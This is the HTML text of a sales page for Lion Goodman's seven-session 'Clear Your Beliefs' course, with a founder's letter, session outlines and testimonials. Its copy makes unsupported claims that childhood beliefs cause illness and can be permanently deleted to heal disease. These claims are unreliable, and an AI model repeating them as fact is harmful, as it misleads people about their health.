<em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free 